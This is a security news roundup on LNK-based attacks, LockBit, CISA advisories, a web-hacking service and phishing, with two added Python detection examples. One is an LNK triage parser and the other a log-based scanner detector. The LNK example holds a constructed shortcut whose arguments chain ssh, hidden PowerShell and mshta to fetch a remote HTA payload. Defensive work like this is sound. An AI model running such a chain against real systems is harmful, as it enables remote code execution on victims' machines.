Windows TCO, Security, and CISA
-
Windows TCO
-
Cyble Inc ☛ LNK Files And SSH Commands: A New Cyber Attack Trend In 2024
In addition to using SCP for file downloads, threat actors have also employed SSH commands to indirectly execute malicious PowerShell or CMD commands through the LNK file. These commands can be configured to load and execute additional payloads or exploit other system utilities.
One such attack observed by CRIL involved a malicious LNK file that used an SSH command to trigger a PowerShell script, which then called mshta.exe to download a malicious payload from a remote URL. The execution of the malicious PowerShell script led to the deployment of a harmful file on the compromised system.
Furthermore, attackers have also leveraged cmd.exe and rundll32 commands to load malicious DLL files and execute them, further complicating detection efforts. In one such case, the attackers used the LNK file to execute a series of commands that ultimately launched a PDF file containing a lure document, which, when opened, triggered the execution of malicious code.
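The chain described above (LNK shortcut, ssh.exe as the launcher, PowerShell or cmd.exe, then mshta.exe or rundll32 fetching the payload) can be triaged straight from the shortcut file, because the target and its command line live in the MS-SHLLINK StringData fields. The following is an added example and is not code from Cyble or CRIL: a minimal .lnk parser that reads the header, skips the ID list and LinkInfo blocks, pulls out RelativePath and Arguments, and scores the chain. The sample shortcuts are constructed in memory; the `ProxyCommand` form of the ssh invocation and the `example.invalid` URL are assumptions shaped after the description, not the real sample.

```python
"""Triage a Windows shortcut (.lnk, MS-SHLLINK) for ssh -> shell -> LOLBin chains.
Added example; handles only the fields needed for triage. Samples are constructed."""
import re
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def _read_string(buf, off, unicode):
    """StringData: CountCharacters (uint16) then that many chars, UTF-16LE if IsUnicode."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    size = count * 2 if unicode else count
    raw = buf[off:off + size]
    if len(raw) != size:
        raise ValueError("truncated StringData")
    return raw.decode("utf-16-le" if unicode else "cp1252"), off + size


def parse_lnk(buf):
    """Return the StringData fields of a shell link; skips LinkTargetIDList and LinkInfo."""
    if (len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    (flags,) = struct.unpack_from("<I", buf, 20)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (uint16) followed by the ID list
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (uint32) counts itself
        off += struct.unpack_from("<I", buf, off)[0]
    fields = {}
    for flag, name in STRING_FIELDS:           # fixed order per the spec
        if flags & flag:
            fields[name], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return fields


# Stages of the chain described in the article, matched over target + arguments.
STAGES = (
    ("ssh_launcher", re.compile(r"\bssh(\.exe)?\b", re.I)),
    ("shell", re.compile(r"\b(powershell|pwsh|cmd)(\.exe)?\b", re.I)),
    ("lolbin", re.compile(r"\b(mshta|rundll32)(\.exe)?\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
)


def triage(fields):
    """'suspicious' when ssh is the launcher for a shell or LOLBin; 'review' on any single hit."""
    parts = [fields[k] for k in ("relative_path", "working_dir", "arguments") if fields.get(k)]
    text = " ".join(parts)
    hits = [name for name, rx in STAGES if rx.search(text)]
    if "ssh_launcher" in hits and ("shell" in hits or "lolbin" in hits):
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"verdict": verdict, "hits": hits, "command": text}


def build_lnk(relative_path, arguments):
    """Constructed sample: header plus RelativePath and Arguments only (no ID list, no LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, times, size, icon, SW_SHOWNORMAL, hotkey, reserved
    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + s(relative_path) + s(arguments)


# Constructed to mirror the described chain; ProxyCommand form and URL are assumptions, not the real sample.
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\OpenSSH\ssh.exe",
    r'-o ProxyCommand="powershell -w hidden -c mshta http://example.invalid/a.hta" .')
BENIGN_LNK = build_lnk(r"..\..\Program Files\Reader\reader.exe", r"--open report.pdf")

if __name__ == "__main__":
    for label, lnk in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage(parse_lnk(lnk)))
```

Point `parse_lnk` at the bytes of any shortcut pulled from a mailbox or download folder; the verdict key is what a triage queue would sort on, and `command` is what goes into the ticket. The parser deliberately ignores the ID list, so a shortcut whose target is carried only there (no RelativePath) will show an empty command and land in `benign`; treat that as a limitation to extend, not a clean bill of health.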
-
Cyble Inc ☛ LockBit Ransomware Group Plots Comeback With 4.0 Release
The launch of LockBit 4.0 will come almost a year after a global law enforcement action disrupted its operations and led to the recovery of nearly 7,000 decryption keys. RansomHub has since emerged as the most active ransomware group.
-
IT Wire ☛ Dragos Industrial Ransomware Analysis: Q3 2024
A critical shift occurred this quarter as dominant groups like LockBit faced significant setbacks following coordinated international law enforcement actions, including Operation Cronos, which dismantled key infrastructure components. This led to a decline in LockBit's activities and forced affiliates, such as Velvet Tempest, to transition to other groups like RansomHub.
The ransomware-as-a-service (RaaS) model continued to mature, relying increasingly on IABs to exploit vulnerabilities, misconfigurations, and stolen credentials that facilitated entry into targeted environments. This initial access enabled ransomware groups to scale their operations by focusing on payload deployment and extortion strategies. This industrialisation of ransomware has continuously lowered barriers to entry for new actors, fostering a competitive and dynamic threat environment. This quarter was no different.
-
-
CISA
-
CISA ☛ 2024-12-12 [Older] Apple Releases Security Updates for Multiple Products
-
CISA ☛ 2024-12-10 [Older] Adobe Releases Security Updates for Multiple Products
-
CISA ☛ 2024-12-10 [Older] Ivanti Releases Security Updates for Multiple Products
-
CISA ☛ 2024-12-10 [Older] Microsoft Releases December 2024 Security Updates
-
CISA ☛ 2024-12-13 [Older] CISA Adds One Known Exploited Vulnerability to Catalog
-
CISA ☛ 2024-12-13 [Older] CISA and EPA Release Joint Fact Sheet Detailing Risks Internet-Exposed HMIs Pose to WWS Sector
-
CISA ☛ 2024-12-12 [Older] CISA Releases Ten Industrial Control Systems Advisories
-
CISA ☛ 2024-12-12 [Older] Siemens CPCI85 Central Processing/Communication
-
CISA ☛ 2024-12-12 [Older] Siemens Engineering Platforms
-
CISA ☛ 2024-12-12 [Older] Siemens RUGGEDCOM ROX II
-
CISA ☛ 2024-12-12 [Older] Siemens Parasolid
-
CISA ☛ 2024-12-12 [Older] Siemens Engineering Platforms
-
CISA ☛ 2024-12-12 [Older] Siemens Simcenter Femap
-
CISA ☛ 2024-12-12 [Older] Siemens Solid Edge SE2024
-
CISA ☛ 2024-12-12 [Older] Siemens COMOS
-
CISA ☛ 2024-12-12 [Older] Siemens Teamcenter Visualization
-
CISA ☛ 2024-12-12 [Older] Siemens SENTRON Powercenter 1000
-
CISA ☛ 2024-12-10 [Older] CISA Adds One Known Exploited Vulnerability to Catalog
-
CISA ☛ 2024-12-10 [Older] CISA Releases Seven Industrial Control Systems Advisories
-
CISA ☛ 2024-12-10 [Older] MOBATIME Network Master Clock
-
CISA ☛ 2024-12-10 [Older] Schneider Electric EcoStruxure Foxboro DCS Core Control Services
-
CISA ☛ 2024-12-10 [Older] Schneider Electric FoxRTU Station
-
CISA ☛ 2024-12-10 [Older] National Instruments LabVIEW
-
CISA ☛ 2024-12-10 [Older] Horner Automation Cscape
-
CISA ☛ 2024-12-10 [Older] Rockwell Automation Arena
-
-
Integrity/Availability/Authenticity
-
Krebs On Security ☛ Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
Researchers at Silent Push say despite Araneida using a seemingly endless supply of proxies to mask the true location of its users, it is a fairly “noisy” scanner that will kick off a large volume of requests to various API endpoints, and make requests to random URLs associated with different content management systems.
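A scanner that behaves the way Silent Push describes (a burst of requests against API endpoints plus probes for paths that belong to several unrelated content management systems) is easy to pick out of an access log, because no legitimate client asks one host for WordPress, Joomla, Drupal and Magento login pages in the same minute. The following is an added example and is not Silent Push's detection logic: a sliding-window detector over combined-format web server log lines. The log lines are constructed, and the CMS path table, window and thresholds are assumptions to tune per site.

```python
"""Flag noisy web scanners from access logs: high request volume from one source that
probes paths belonging to several different CMSes. Added example; log lines constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx combined log format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Path prefixes that exist on one CMS only (assumed table; extend for your stack).
CMS_MARKERS = {
    "wordpress": ("/wp-login.php", "/wp-admin/", "/xmlrpc.php"),
    "joomla": ("/administrator/", "/index.php?option=com_"),
    "drupal": ("/user/login", "/core/CHANGELOG.txt"),
    "magento": ("/downloader/",),
}


def detect_scanners(lines, window=timedelta(seconds=60), min_requests=30, min_cms=2, min_404=15):
    """Return {ip: evidence} for sources that, inside `window`, exceed all three thresholds."""
    events = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                   # skip lines that are not combined format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events[m["ip"]].append((ts, m["path"], m["status"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            win = evs[start:end + 1]
            cms = {name for _, path, _ in win
                   for name, prefixes in CMS_MARKERS.items() if path.startswith(prefixes)}
            not_found = sum(1 for _, _, status in win if status == "404")
            if len(win) >= min_requests and len(cms) >= min_cms and not_found >= min_404:
                flagged[ip] = {"requests": len(win), "cms": cms, "not_found": not_found,
                               "first": evs[start][0], "last": evs[end][0]}
                break
    return flagged


def make_line(ip, ts, path, status):
    """Constructed combined-format log line."""
    return f'{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "GET {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


T0 = datetime(2024, 12, 10, 10, 0, 0, tzinfo=timezone.utc)
# A scanner cycling CMS probes and API endpoints, one request per second, nearly all 404.
PROBES = ["/wp-login.php", "/xmlrpc.php", "/wp-admin/install.php",
          "/administrator/index.php", "/index.php?option=com_users",
          "/user/login", "/core/CHANGELOG.txt", "/downloader/",
          "/api/v1/users", "/api/users", "/graphql", "/.env"]
SAMPLE_LOG = [make_line("203.0.113.9", T0 + timedelta(seconds=i), PROBES[i % len(PROBES)], 404)
              for i in range(40)]
# A real WordPress admin: a few requests to one CMS, spread over a minute, all 200.
SAMPLE_LOG += [make_line("198.51.100.7", T0 + timedelta(seconds=6 * i),
                         "/wp-admin/" if i else "/wp-login.php", 200) for i in range(10)]

if __name__ == "__main__":
    for ip, evidence in detect_scanners(SAMPLE_LOG).items():
        print(ip, evidence)
```

Requiring all three conditions at once (volume, several CMS families, and a high 404 count) is what keeps a busy legitimate client or a single misconfigured crawler out of the result; the proxy rotation Silent Push mentions means a real deployment should key on something longer-lived than the source IP where one is available, such as a JA3/JA4 fingerprint or User-Agent plus ASN.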
-
EFF ☛ The Breachies 2024: The Worst, Weirdest, Most Impactful Data Breaches of the Year
Every year, countless emails hit our inboxes telling us that our personal information was accessed, shared, or stolen in a data breach. In many cases, there is little we can do. Most of us can assume that at least our phone numbers, emails, addresses, credit card numbers, and social security numbers are all available somewhere on the [Internet].
-
The Register UK ☛ Crooks use Docusign lures to attempt Azure account takeovers
Unknown criminals went on a phishing expedition that targeted about 20,000 users across the automotive, chemical and industrial compound manufacturing sectors in Europe, and tried to steal account credentials and then hijack the victims' Microsoft Azure cloud infrastructure.
-